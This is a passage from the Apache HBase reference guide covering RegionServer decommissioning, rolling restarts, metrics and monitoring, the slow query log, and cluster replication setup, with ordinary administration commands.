in the HBase directory on the particular node:\n\n----\n$ .\/bin\/hbase-daemon.sh stop regionserver\n----\n\nThe RegionServer will first close all regions and then shut itself down.\nOn shutdown, the RegionServer's ephemeral node in ZooKeeper will expire.\nThe master will notice the RegionServer gone and will treat it as a 'crashed' server; it will reassign the nodes the RegionServer was carrying.\n\n.Disable the Load Balancer before Decommissioning a node\n[NOTE]\n====\nIf the load balancer runs while a node is shutting down, then there could be contention between the Load Balancer and the Master's recovery of the just decommissioned RegionServer.\nAvoid any problems by disabling the balancer first.\nSee <<lb,lb>> below.\n====\n\n.Kill Node Tool\n[NOTE]\n====\nIn hbase-2.0, in the bin directory, we added a script named _considerAsDead.sh_ that can be used to kill a regionserver.\nHardware issues could be detected by specialized monitoring tools before the zookeeper timeout has expired. _considerAsDead.sh_ is a simple function to mark a RegionServer as dead.\nIt deletes all the znodes of the server, starting the recovery process.\nPlug in the script into your monitoring\/fault detection tools to initiate faster failover.\nBe careful how you use this disruptive tool.\nCopy the script if you need to make use of it in a version of hbase previous to hbase-2.0.\n====\n\nA downside to the above stop of a RegionServer is that regions could be offline for a good period of time.\nRegions are closed in order.\nIf many regions on the server, the first region to close may not be back online until all regions close and after the master notices the RegionServer's znode gone.\nIn Apache HBase 0.90.2, we added facility for having a node gradually shed its load and then shutdown itself down.\nApache HBase 0.90.2 added the _graceful_stop.sh_ script.\nHere is its usage:\n\n----\n$ .\/bin\/graceful_stop.sh\nUsage: graceful_stop.sh [--config &conf-dir>] [--restart] [--reload] [--thrift] [--rest] &hostname>\n thrift If we should stop\/start thrift before\/after the hbase stop\/start\n rest If we should stop\/start rest before\/after the hbase stop\/start\n restart If we should restart after graceful stop\n reload Move offloaded regions back on to the stopped server\n debug Move offloaded regions back on to the stopped server\n hostname Hostname of server we are to stop\n----\n\nTo decommission a loaded RegionServer, run the following: +$\n .\/bin\/graceful_stop.sh HOSTNAME+ where `HOSTNAME` is the host carrying the RegionServer you would decommission.\n\n.On `HOSTNAME`\n[NOTE]\n====\nThe `HOSTNAME` passed to _graceful_stop.sh_ must match the hostname that hbase is using to identify RegionServers.\nCheck the list of RegionServers in the master UI for how HBase is referring to servers.\nIt's usually hostname but can also be FQDN.\nWhatever HBase is using, this is what you should pass the _graceful_stop.sh_ decommission script.\nIf you pass IPs, the script is not yet smart enough to make a hostname (or FQDN) of it and so it will fail when it checks if server is currently running; the graceful unloading of regions will not run.\n====\n\nThe _graceful_stop.sh_ script will move the regions off the decommissioned RegionServer one at a time to minimize region churn.\nIt will verify the region deployed in the new location before it will moves the next region and so on until the decommissioned server is carrying zero regions.\nAt this point, the _graceful_stop.sh_ tells the RegionServer `stop`.\nThe master will at this point notice the RegionServer gone but all regions will have already been redeployed and because the RegionServer went down cleanly, there will be no WAL logs to split.\n\n[[lb]]\n.Load Balancer\n[NOTE]\n====\nIt is assumed that the Region Load Balancer is disabled while the `graceful_stop` script runs (otherwise the balancer and the decommission script will end up fighting over region deployments). Use the shell to disable the balancer:\n\n[source]\n----\nhbase(main):001:0> balance_switch false\ntrue\n0 row(s) in 0.3590 seconds\n----\n\nThis turns the balancer OFF.\nTo reenable, do:\n\n[source]\n----\nhbase(main):001:0> balance_switch true\nfalse\n0 row(s) in 0.3590 seconds\n----\n\nThe `graceful_stop` will check the balancer and if enabled, will turn it off before it goes to work.\nIf it exits prematurely because of error, it will not have reset the balancer.\nHence, it is better to manage the balancer apart from `graceful_stop` reenabling it after you are done w\/ graceful_stop.\n====\n\n[[draining.servers]]\n==== Decommissioning several Regions Servers concurrently\n\nIf you have a large cluster, you may want to decommission more than one machine at a time by gracefully stopping multiple RegionServers concurrently.\nTo gracefully drain multiple regionservers at the same time, RegionServers can be put into a \"draining\" state.\nThis is done by marking a RegionServer as a draining node by creating an entry in ZooKeeper under the _hbase_root\/draining_ znode.\nThis znode has format `name,port,startcode` just like the regionserver entries under _hbase_root\/rs_ znode.\n\nWithout this facility, decommissioning multiple nodes may be non-optimal because regions that are being drained from one region server may be moved to other regionservers that are also draining.\nMarking RegionServers to be in the draining state prevents this from happening.\nSee this link:http:\/\/inchoate-clatter.blogspot.com\/2012\/03\/hbase-ops-automation.html[blog\n post] for more details.\n\n[[bad.disk]]\n==== Bad or Failing Disk\n\nIt is good having <<dfs.datanode.failed.volumes.tolerated,dfs.datanode.failed.volumes.tolerated>> set if you have a decent number of disks per machine for the case where a disk plain dies.\nBut usually disks do the \"John Wayne\" -- i.e.\ntake a while to go down spewing errors in _dmesg_ -- or for some reason, run much slower than their companions.\nIn this case you want to decommission the disk.\nYou have two options.\nYou can link:http:\/\/wiki.apache.org\/hadoop\/FAQ#I_want_to_make_a_large_cluster_smaller_by_taking_out_a_bunch_of_nodes_simultaneously._How_can_this_be_done.3F[decommission\n the datanode] or, less disruptive in that only the bad disks data will be rereplicated, can stop the datanode, unmount the bad volume (You can't umount a volume while the datanode is using it), and then restart the datanode (presuming you have set dfs.datanode.failed.volumes.tolerated > 0). The regionserver will throw some errors in its logs as it recalibrates where to get its data from -- it will likely roll its WAL log too -- but in general but for some latency spikes, it should keep on chugging.\n\n.Short Circuit Reads\n[NOTE]\n====\nIf you are doing short-circuit reads, you will have to move the regions off the regionserver before you stop the datanode; when short-circuiting reading, though chmod'd so regionserver cannot have access, because it already has the files open, it will be able to keep reading the file blocks from the bad disk even though the datanode is down.\nMove the regions back after you restart the datanode.\n====\n\n[[rolling]]\n=== Rolling Restart\n\nSome cluster configuration changes require either the entire cluster, or the RegionServers, to be restarted in order to pick up the changes.\nIn addition, rolling restarts are supported for upgrading to a minor or maintenance release, and to a major release if at all possible.\nSee the release notes for release you want to upgrade to, to find out about limitations to the ability to perform a rolling upgrade.\n\nThere are multiple ways to restart your cluster nodes, depending on your situation.\nThese methods are detailed below.\n\n==== Using the `rolling-restart.sh` Script\n\nHBase ships with a script, _bin\/rolling-restart.sh_, that allows you to perform rolling restarts on the entire cluster, the master only, or the RegionServers only.\nThe script is provided as a template for your own script, and is not explicitly tested.\nIt requires password-less SSH login to be configured and assumes that you have deployed using a tarball.\nThe script requires you to set some environment variables before running it.\nExamine the script and modify it to suit your needs.\n\n._rolling-restart.sh_ General Usage\n====\n----\n\n$ .\/bin\/rolling-restart.sh --help\nUsage: rolling-restart.sh [--config <hbase-confdir>] [--rs-only] [--master-only] [--graceful] [--maxthreads xx]\n----\n====\n\nRolling Restart on RegionServers Only::\n To perform a rolling restart on the RegionServers only, use the `--rs-only` option.\n This might be necessary if you need to reboot the individual RegionServer or if you make a configuration change that only affects RegionServers and not the other HBase processes.\n\nRolling Restart on Masters Only::\n To perform a rolling restart on the active and backup Masters, use the `--master-only` option.\n You might use this if you know that your configuration change only affects the Master and not the RegionServers, or if you need to restart the server where the active Master is running.\n\nGraceful Restart::\n If you specify the `--graceful` option, RegionServers are restarted using the _bin\/graceful_stop.sh_ script, which moves regions off a RegionServer before restarting it.\n This is safer, but can delay the restart.\n\nLimiting the Number of Threads::\n To limit the rolling restart to using only a specific number of threads, use the `--maxthreads` option.\n\n[[rolling.restart.manual]]\n==== Manual Rolling Restart\n\nTo retain more control over the process, you may wish to manually do a rolling restart across your cluster.\nThis uses the `graceful-stop.sh` command <<decommission,decommission>>.\nIn this method, you can restart each RegionServer individually and then move its old regions back into place, retaining locality.\nIf you also need to restart the Master, you need to do it separately, and restart the Master before restarting the RegionServers using this method.\nThe following is an example of such a command.\nYou may need to tailor it to your environment.\nThis script does a rolling restart of RegionServers only.\nIt disables the load balancer before moving the regions.\n\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &;\n----\n\nMonitor the output of the _\/tmp\/log.txt_ file to follow the progress of the script.\n\n==== Logic for Crafting Your Own Rolling Restart Script\n\nUse the following guidelines if you want to create your own rolling restart script.\n\n. Extract the new release, verify its configuration, and synchronize it to all nodes of your cluster using `rsync`, `scp`, or another secure synchronization mechanism.\n. Use the hbck utility to ensure that the cluster is consistent.\n+\n----\n\n$ .\/bin\/hbck\n----\n+\nPerform repairs if required.\nSee <<hbck,hbck>> for details.\n\n. Restart the master first.\n You may need to modify these commands if your new HBase directory is different from the old one, such as for an upgrade.\n+\n----\n\n$ .\/bin\/hbase-daemon.sh stop master; .\/bin\/hbase-daemon.sh start master\n----\n\n. Gracefully restart each RegionServer, using a script such as the following, from the Master.\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &\n----\n+\nIf you are running Thrift or REST servers, pass the --thrift or --rest options.\nFor other available options, run the `bin\/graceful-stop.sh --help` command.\n+\nIt is important to drain HBase regions slowly when restarting multiple RegionServers.\nOtherwise, multiple regions go offline simultaneously and must be reassigned to other nodes, which may also go offline soon.\nThis can negatively affect performance.\nYou can inject delays into the script above, for instance, by adding a Shell command such as `sleep`.\nTo wait for 5 minutes between each RegionServer restart, modify the above script to the following:\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i & sleep 5m; done &> \/tmp\/log.txt &\n----\n\n. Restart the Master again, to clear out the dead servers list and re-enable the load balancer.\n. Run the `hbck` utility again, to be sure the cluster is consistent.\n\n[[adding.new.node]]\n=== Adding a New Node\n\nAdding a new regionserver in HBase is essentially free, you simply start it like this: `$ .\/bin\/hbase-daemon.sh start regionserver` and it will register itself with the master.\nIdeally you also started a DataNode on the same machine so that the RS can eventually start to have local files.\nIf you rely on ssh to start your daemons, don't forget to add the new hostname in _conf\/regionservers_ on the master.\n\nAt this point the region server isn't serving data because no regions have moved to it yet.\nIf the balancer is enabled, it will start moving regions to the new RS.\nOn a small\/medium cluster this can have a very adverse effect on latency as a lot of regions will be offline at the same time.\nIt is thus recommended to disable the balancer the same way it's done when decommissioning a node and move the regions manually (or even better, using a script that moves them one by one).\n\nThe moved regions will all have 0% locality and won't have any blocks in cache so the region server will have to use the network to serve requests.\nApart from resulting in higher latency, it may also be able to use all of your network card's capacity.\nFor practical purposes, consider that a standard 1GigE NIC won't be able to read much more than _100MB\/s_.\nIn this case, or if you are in a OLAP environment and require having locality, then it is recommended to major compact the moved regions.\n\n[[hbase_metrics]]\n== HBase Metrics\n\nHBase emits metrics which adhere to the link:http:\/\/hadoop.apache.org\/core\/docs\/current\/api\/org\/apache\/hadoop\/metrics\/package-summary.html[Hadoop metrics] API.\nStarting with HBase 0.95footnote:[The Metrics system was redone in\n HBase 0.96. See Migration\n to the New Metrics Hotness \u2013 Metrics2 by Elliot Clark for detail], HBase is configured to emit a default set of metrics with a default sampling period of every 10 seconds.\nYou can use HBase metrics in conjunction with Ganglia.\nYou can also filter which metrics are emitted and extend the metrics framework to capture custom metrics appropriate for your environment.\n\n=== Metric Setup\n\nFor HBase 0.95 and newer, HBase ships with a default metrics configuration, or [firstterm]_sink_.\nThis includes a wide variety of individual metrics, and emits them every 10 seconds by default.\nTo configure metrics for a given region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file.\nRestart the region server for the changes to take effect.\n\nTo change the sampling rate for the default sink, edit the line beginning with `*.period`.\nTo filter which metrics are emitted or to extend the metrics framework, see http:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html\n\n.HBase Metrics and Ganglia\n[NOTE]\n====\nBy default, HBase emits a large number of metrics per region server.\nGanglia may have difficulty processing all these metrics.\nConsider increasing the capacity of the Ganglia server or reducing the number of metrics emitted by HBase.\nSee link:http:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html#filtering[Metrics Filtering].\n====\n\n=== Disabling Metrics\n\nTo disable metrics for a region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file and comment out any uncommented lines.\nRestart the region server for the changes to take effect.\n\n[[discovering.available.metrics]]\n=== Discovering Available Metrics\n\nRather than listing each metric which HBase emits by default, you can browse through the available metrics, either as a JSON output or via JMX.\nDifferent metrics are exposed for the Master process and each region server process.\n\n.Procedure: Access a JSON Output of Available Metrics\n. After starting HBase, access the region server's web UI, at pass:[http:\/\/REGIONSERVER_HOSTNAME:60030] by default (or port 16030 in HBase 1.0+).\n. Click the [label]#Metrics Dump# link near the top.\n The metrics for the region server are presented as a dump of the JMX bean in JSON format.\n This will dump out all metrics names and their values.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60030\/jmx?description=true].\n Not all beans and attributes have descriptions.\n. To view metrics for the Master, connect to the Master's web UI instead (defaults to pass:[http:\/\/localhost:60010] or port 16010 in HBase 1.0+) and click its [label]#Metrics\n Dump# link.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60010\/jmx?description=true].\n Not all beans and attributes have descriptions.\n\n\nYou can use many different tools to view JMX content by browsing MBeans.\nThis procedure uses `jvisualvm`, which is an application usually available in the JDK.\n\n.Procedure: Browse the JMX Output of Available Metrics\n. Start HBase, if it is not already running.\n. Run the command `jvisualvm` command on a host with a GUI display.\n You can launch it from the command line or another method appropriate for your operating system.\n. Be sure the [label]#VisualVM-MBeans# plugin is installed. Browse to *Tools -> Plugins*. Click [label]#Installed# and check whether the plugin is listed.\n If not, click [label]#Available Plugins#, select it, and click btn:[Install].\n When finished, click btn:[Close].\n. To view details for a given HBase process, double-click the process in the [label]#Local# sub-tree in the left-hand panel.\n A detailed view opens in the right-hand panel.\n Click the [label]#MBeans# tab which appears as a tab in the top of the right-hand panel.\n. To access the HBase metrics, navigate to the appropriate sub-bean:\n.* Master:\n.* RegionServer:\n\n. The name of each metric and its current value is displayed in the [label]#Attributes# tab.\n For a view which includes more details, including the description of each attribute, click the [label]#Metadata# tab.\n\n=== Units of Measure for Metrics\n\nDifferent metrics are expressed in different units, as appropriate.\nOften, the unit of measure is in the name (as in the metric `shippedKBs`). Otherwise, use the following guidelines.\nWhen in doubt, you may need to examine the source for a given metric.\n\n* Metrics that refer to a point in time are usually expressed as a timestamp.\n* Metrics that refer to an age (such as `ageOfLastShippedOp`) are usually expressed in milliseconds.\n* Metrics that refer to memory sizes are in bytes.\n* Sizes of queues (such as `sizeOfLogQueue`) are expressed as the number of items in the queue.\n Determine the size by multiplying by the block size (default is 64 MB in HDFS).\n* Metrics that refer to things like the number of a given type of operations (such as `logEditsRead`) are expressed as an integer.\n\n[[master_metrics]]\n=== Most Important Master Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.master.numRegionServers::\n Number of live regionservers\n\nhbase.master.numDeadRegionServers::\n Number of dead regionservers\n\nhbase.master.ritCount ::\n The number of regions in transition\n\nhbase.master.ritCountOverThreshold::\n The number of regions that have been in transition longer than a threshold time (default: 60 seconds)\n\nhbase.master.ritOldestAge::\n The age of the longest region in transition, in milliseconds\n\n[[rs_metrics]]\n=== Most Important RegionServer Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.regionserver.regionCount::\n The number of regions hosted by the regionserver\n\nhbase.regionserver.storeFileCount::\n The number of store files on disk currently managed by the regionserver\n\nhbase.regionserver.storeFileSize::\n Aggregate size of the store files on disk\n\nhbase.regionserver.hlogFileCount::\n The number of write ahead logs not yet archived\n\nhbase.regionserver.totalRequestCount::\n The total number of requests received\n\nhbase.regionserver.readRequestCount::\n The number of read requests received\n\nhbase.regionserver.writeRequestCount::\n The number of write requests received\n\nhbase.regionserver.numOpenConnections::\n The number of open connections at the RPC layer\n\nhbase.regionserver.numActiveHandler::\n The number of RPC handlers actively servicing requests\n\nhbase.regionserver.numCallsInGeneralQueue::\n The number of currently enqueued user requests\n\nhbase.regionserver.numCallsInReplicationQueue::\n The number of currently enqueued operations received from replication\n\nhbase.regionserver.numCallsInPriorityQueue::\n The number of currently enqueued priority (internal housekeeping) requests\n\nhbase.regionserver.flushQueueLength::\n Current depth of the memstore flush queue.\n If increasing, we are falling behind with clearing memstores out to HDFS.\n\nhbase.regionserver.updatesBlockedTime::\n Number of milliseconds updates have been blocked so the memstore can be flushed\n\nhbase.regionserver.compactionQueueLength::\n Current depth of the compaction request queue.\n If increasing, we are falling behind with storefile compaction.\n\nhbase.regionserver.blockCacheHitCount::\n The number of block cache hits\n\nhbase.regionserver.blockCacheMissCount::\n The number of block cache misses\n\nhbase.regionserver.blockCacheExpressHitPercent ::\n The percent of the time that requests with the cache turned on hit the cache\n\nhbase.regionserver.percentFilesLocal::\n Percent of store file data that can be read from the local DataNode, 0-100\n\nhbase.regionserver.<op>_<measure>::\n Operation latencies, where <op> is one of Append, Delete, Mutate, Get, Replay, Increment; and where <measure> is one of min, max, mean, median, 75th_percentile, 95th_percentile, 99th_percentile\n\nhbase.regionserver.slow<op>Count ::\n The number of operations we thought were slow, where <op> is one of the list above\n\nhbase.regionserver.GcTimeMillis::\n Time spent in garbage collection, in milliseconds\n\nhbase.regionserver.GcTimeMillisParNew::\n Time spent in garbage collection of the young generation, in milliseconds\n\nhbase.regionserver.GcTimeMillisConcurrentMarkSweep::\n Time spent in garbage collection of the old generation, in milliseconds\n\nhbase.regionserver.authenticationSuccesses::\n Number of client connections where authentication succeeded\n\nhbase.regionserver.authenticationFailures::\n Number of client connection authentication failures\n\nhbase.regionserver.mutationsWithoutWALCount ::\n Count of writes submitted with a flag indicating they should bypass the write ahead log\n\n[[ops.monitoring]]\n== HBase Monitoring\n\n[[ops.monitoring.overview]]\n=== Overview\n\nThe following metrics are arguably the most important to monitor for each RegionServer for \"macro monitoring\", preferably with a system like link:http:\/\/opentsdb.net\/[OpenTSDB].\nIf your cluster is having performance issues it's likely that you'll see something unusual with this group.\n\nHBase::\n * See <<rs_metrics,rs metrics>>\n\nOS::\n * IO Wait\n * User CPU\n\nJava::\n * GC\n\nFor more information on HBase metrics, see <<hbase_metrics,hbase metrics>>.\n\n[[ops.slow.query]]\n=== Slow Query Log\n\nThe HBase slow query log consists of parseable JSON structures describing the properties of those client operations (Gets, Puts, Deletes, etc.) that either took too long to run, or produced too much output.\nThe thresholds for \"too long to run\" and \"too much output\" are configurable, as described below.\nThe output is produced inline in the main region server logs so that it is easy to discover further details from context with other logged events.\nIt is also prepended with identifying tags `(responseTooSlow)`, `(responseTooLarge)`, `(operationTooSlow)`, and `(operationTooLarge)` in order to enable easy filtering with grep, in case the user desires to see only slow queries.\n\n==== Configuration\n\nThere are two configuration knobs that can be used to adjust the thresholds for when queries are logged.\n\n* `hbase.ipc.warn.response.time` Maximum number of milliseconds that a query can be run without being logged.\n Defaults to 10000, or 10 seconds.\n Can be set to -1 to disable logging by time.\n* `hbase.ipc.warn.response.size` Maximum byte size of response that a query can return without being logged.\n Defaults to 100 megabytes.\n Can be set to -1 to disable logging by size.\n\n==== Metrics\n\nThe slow query log exposes to metrics to JMX.\n\n* `hadoop.regionserver_rpc_slowResponse` a global metric reflecting the durations of all responses that triggered logging.\n* `hadoop.regionserver_rpc_methodName.aboveOneSec` A metric reflecting the durations of all responses that lasted for more than one second.\n\n==== Output\n\nThe output is tagged with operation e.g. `(operationTooSlow)` if the call was a client operation, such as a Put, Get, or Delete, which we expose detailed fingerprint information for.\nIf not, it is tagged `(responseTooSlow)` and still produces parseable JSON output, but with less verbose information solely regarding its duration and size in the RPC itself. `TooLarge` is substituted for `TooSlow` if the response size triggered the logging, with `TooLarge` appearing even in the case that both size and duration triggered logging.\n\n==== Example\n\n\n[source]\n----\n2011-09-08 10:01:25,824 WARN org.apache.hadoop.ipc.HBaseServer: (operationTooSlow): {\"tables\":{\"riley2\":{\"puts\":[{\"totalColumns\":11,\"families\":{\"actions\":[{\"timestamp\":1315501284459,\"qualifier\":\"0\",\"vlen\":9667580},{\"timestamp\":1315501284459,\"qualifier\":\"1\",\"vlen\":10122412},{\"timestamp\":1315501284459,\"qualifier\":\"2\",\"vlen\":11104617},{\"timestamp\":1315501284459,\"qualifier\":\"3\",\"vlen\":13430635}]},\"row\":\"cfcd208495d565ef66e7dff9f98764da:0\"}],\"families\":[\"actions\"]}},\"processingtimems\":956,\"client\":\"10.47.34.63:33623\",\"starttimems\":1315501284456,\"queuetimems\":0,\"totalPuts\":1,\"class\":\"HRegionServer\",\"responsesize\":0,\"method\":\"multiPut\"}\n----\n\nNote that everything inside the \"tables\" structure is output produced by MultiPut's fingerprint, while the rest of the information is RPC-specific, such as processing time and client IP\/port.\nOther client operations follow the same pattern and the same general structure, with necessary differences due to the nature of the individual operations.\nIn the case that the call is not a client operation, that detailed fingerprint information will be completely absent.\n\nThis particular example, for example, would indicate that the likely cause of slowness is simply a very large (on the order of 100MB) multiput, as we can tell by the \"vlen,\" or value length, fields of each put in the multiPut.\n\n=== Block Cache Monitoring\n\nStarting with HBase 0.98, the HBase Web UI includes the ability to monitor and report on the performance of the block cache.\nTo view the block cache reports, click .\nFollowing are a few examples of the reporting capabilities.\n\n.Basic Info\nimage::bc_basic.png[]\n\n.Config\nimage::bc_config.png[]\n\n.Stats\nimage::bc_stats.png[]\n\n.L1 and L2\nimage::bc_l1.png[]\n\nThis is not an exhaustive list of all the screens and reports available.\nHave a look in the Web UI.\n\n== Cluster Replication\n\nNOTE: This information was previously available at\nlink:http:\/\/hbase.apache.org#replication[Cluster Replication].\n\nHBase provides a cluster replication mechanism which allows you to keep one cluster's state synchronized with that of another cluster, using the write-ahead log (WAL) of the source cluster to propagate the changes.\nSome use cases for cluster replication include:\n\n* Backup and disaster recovery\n* Data aggregation\n* Geographic data distribution\n* Online data ingestion combined with offline data analytics\n\nNOTE: Replication is enabled at the granularity of the column family.\nBefore enabling replication for a column family, create the table and all column families to be replicated, on the destination cluster.\n\n=== Replication Overview\n\nCluster replication uses a source-push methodology.\nAn HBase cluster can be a source (also called master or active, meaning that it is the originator of new data), a destination (also called slave or passive, meaning that it receives data via replication), or can fulfill both roles at once.\nReplication is asynchronous, and the goal of replication is eventual consistency.\nWhen the source receives an edit to a column family with replication enabled, that edit is propagated to all destination clusters using the WAL for that for that column family on the RegionServer managing the relevant region.\n\nWhen data is replicated from one cluster to another, the original source of the data is tracked via a cluster ID which is part of the metadata.\nIn HBase 0.96 and newer (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7709[HBASE-7709]), all clusters which have already consumed the data are also tracked.\nThis prevents replication loops.\n\nThe WALs for each region server must be kept in HDFS as long as they are needed to replicate data to any slave cluster.\nEach region server reads from the oldest log it needs to replicate and keeps track of its progress processing WALs inside ZooKeeper to simplify failure recovery.\nThe position marker which indicates a slave cluster's progress, as well as the queue of WALs to process, may be different for every slave cluster.\n\nThe clusters participating in replication can be of different sizes.\nThe master cluster relies on randomization to attempt to balance the stream of replication on the slave clusters.\nIt is expected that the slave cluster has storage capacity to hold the replicated data, as well as any data it is responsible for ingesting.\nIf a slave cluster does run out of room, or is inaccessible for other reasons, it throws an error and the master retains the WAL and retries the replication at intervals.\n\n.Consistency Across Replicated Clusters\n[WARNING]\n====\nHow your application builds on top of the HBase API matters when replication is in play. HBase's replication system provides at-least-once delivery of client edits for an enabled column family to each configured destination cluster. In the event of failure to reach a given destination, the replication system will retry sending edits in a way that might repeat a given message. Further more, there is not a guaranteed order of delivery for client edits. In the event of a RegionServer failing, recovery of the replication queue happens independent of recovery of the individual regions that server was previously handling. This means that it is possible for the not-yet-replicated edits to be serviced by a RegionServer that is currently slower to replicate than the one that handles edits from after the failure.\n\nThe combination of these two properties (at-least-once delivery and the lack of message ordering) means that some destination clusters may end up in a different state if your application makes use of operations that are not idempotent, e.g. Increments.\n====\n\n.Terminology Changes\n[NOTE]\n====\nPreviously, terms such as [firstterm]_master-master_, [firstterm]_master-slave_, and [firstterm]_cyclical_ were used to describe replication relationships in HBase.\nThese terms added confusion, and have been abandoned in favor of discussions about cluster topologies appropriate for different scenarios.\n====\n\n.Cluster Topologies\n* A central source cluster might propagate changes out to multiple destination clusters, for failover or due to geographic distribution.\n* A source cluster might push changes to a destination cluster, which might also push its own changes back to the original cluster.\n* Many different low-latency clusters might push changes to one centralized cluster for backup or resource-intensive data analytics jobs.\n The processed data might then be replicated back to the low-latency clusters.\n\nMultiple levels of replication may be chained together to suit your organization's needs.\nThe following diagram shows a hypothetical scenario.\nUse the arrows to follow the data paths.\n\n.Example of a Complex Cluster Replication Configuration\nimage::hbase_replication_diagram.jpg[]\n\nHBase replication borrows many concepts from the [firstterm]_statement-based replication_ design used by MySQL.\nInstead of SQL statements, entire WALEdits (consisting of multiple cell inserts coming from Put and Delete operations on the clients) are replicated in order to maintain atomicity.\n\n=== Managing and Configuring Cluster Replication\n.Cluster Configuration Overview\n\n. Configure and start the source and destination clusters.\n Create tables with the same names and column families on both the source and destination clusters, so that the destination cluster knows where to store data it will receive.\n. All hosts in the source and destination clusters should be reachable to each other.\n. If both clusters use the same ZooKeeper cluster, you must use a different `zookeeper.znode.parent`, because they cannot write in the same folder.\n. Check to be sure that replication has not been disabled. `hbase.replication` defaults to `true`.\n. On the source cluster, in HBase Shell, add the destination cluster as a peer, using the `add_peer` command.\n. On the source cluster, in HBase Shell, enable the table replication, using the `enable_table_replication` command.\n. Check the logs to see if replication is taking place. If so, you will see messages like the following, coming from the ReplicationSource.\n----\nLOG.info(\"Replicating \"+clusterId + \" -> \" + peerClusterId);\n----\n\n.Cluster Management Commands\nadd_peer <ID> <CLUSTER_KEY>::\n Adds a replication relationship between two clusters. +\n * ID -- a unique string, which must not contain a hyphen.\n * CLUSTER_KEY: composed using the following template, with appropriate place-holders: `hbase.zookeeper.quorum:hbase.zookeeper.property.clientPort:zookeeper.znode.parent`\nlist_peers:: list all replication relationships known by this cluster\nenable_peer <ID>::\n Enable a previously-disabled replication relationship\ndisable_peer <ID>::\n Disable a replication relationship. HBase will no longer send edits to that\n peer cluster, but it still keeps track of all the new WALs that it will need\n to replicate if and when it is re-enabled. WALs are retained when enabling or disabling\n replication as long as peers exist.\nremove_peer <ID>::\n Disable and remove a replication relationship. HBase will no longer send edits to that peer cluster or keep track of WALs.\nenable_table_replication <TABLE_NAME>::\n Enable the table replication switch for all its column families. If the table is not found in the destination cluster then it will create one with the same name and column families.\ndisable_table_replication <TABLE_NAME>::\n Disable the table replication switch for all its column families.\n\n=== Verifying Replicated Data\n\nThe `VerifyReplication` MapReduce job, which is included in HBase, performs a systematic comparison of replicated data between two different clusters. Run the VerifyReplication job on the master cluster, supplying it with the peer ID and table name to use for validation. You can limit the verification further by specifying a time range or specific families. The job's short name is `verifyrep`. To run the job, use a command like the following:\n+\n[source,bash]\n----\n$ HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` \"${HADOOP_HOME}\/bin\/hadoop\" jar \"${HBASE_HOME}\/hbase-server-VERSION.jar\" verifyrep --starttime=<timestamp> --endtime=<timestamp> --families=<myFam> <ID> <tableName>\n----\n+\nThe `VerifyReplication` command prints out `GOODROWS` and `BADROWS` counters to indicate rows that did and did not replicate correctly.\n\n=== Detailed Information About Cluster Replication\n\n.Replication Architecture Overview\nimage::replication_overview.png[]\n\n==== Life of a WAL Edit\n\nA single WAL edit goes through several steps in order to be replicated to a slave cluster.\n\n. An HBase client uses a Put or Delete operation to manipulate data in HBase.\n. The region server writes the request to the WAL in a way allows it to be replayed if it is not written successfully.\n. If the changed cell corresponds to a column family that is scoped for replication, the edit is added to the queue for replication.\n. In a separate thread, the edit is read from the log, as part of a batch process.\n Only the KeyValues that are eligible for replication are kept.\n Replicable KeyValues are part of a column family whose schema is scoped GLOBAL, are not part of a catalog such as `hbase:meta`, did not originate from the target slave cluster, and have not already been consumed by the target slave cluster.\n. The edit is tagged with the master's UUID and added to a buffer.\n When the buffer is filled, or the reader reaches the end of the file, the buffer is sent to a random region server on the slave cluster.\n. The region server reads the edits sequentially and separates them into buffers, one buffer per table.\n After all edits are read, each buffer is flushed using link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], HBase's normal client.\n The master's UUID and the UUIDs of slaves which have already consumed the data are preserved in the edits they are applied, in order to prevent replication loops.\n. In the master, the offset for the WAL that is currently being replicated is registered in ZooKeeper.\n\n. The first three steps, where the edit is inserted, are identical.\n. Again in a separate thread, the region server reads, filters, and edits the log edits in the same way as above.\n The slave region server does not answer the RPC call.\n. The master sleeps and tries again a configurable number of times.\n. If the slave region server is still not available, the master selects a new subset of region server to replicate to, and tries again to send the buffer of edits.\n. Meanwhile, the WALs are rolled and stored in a queue in ZooKeeper.\n Logs that are [firstterm]_archived_ by their region server, by moving them from the region server's log directory to a central log directory, will update their paths in the in-memory queue of the replicating thread.\n. When the slave cluster is finally available, the buffer is applied in the same way as during normal processing.\n The master region server will then replicate the backlog of logs that accumulated during the outage.\n\n.Spreading Queue Failover Load\nWhen replication is active, a subset of region servers in the source cluster is responsible for shipping edits to the sink.\nThis responsibility must be failed over like all other region server functions should a process or node crash.\nThe following configuration settings are recommended for maintaining an even distribution of replication activity over the remaining live servers in the source cluster:\n\n* Set `replication.source.maxretriesmultiplier` to `300`.\n* Set `replication.source.sleepforretries` to `1` (1 second). This value, combined with the value of `replication.source.maxretriesmultiplier`, causes the retry cycle to last about 5 minutes.\n* Set `replication.sleep.before.failover` to `30000` (30 seconds) in the source cluster site configuration.\n\n[[cluster.replication.preserving.tags]]\n.Preserving Tags During Replication\nBy default, the codec used for replication between clusters strips tags, such as cell-level ACLs, from cells.\nTo prevent the tags from being stripped, you can use a different codec which does not strip them.\nConfigure `hbase.replication.rpc.codec` to use `org.apache.hadoop.hbase.codec.KeyValueCodecWithTags`, on both the source and sink RegionServers involved in the replication.\nThis option was introduced in 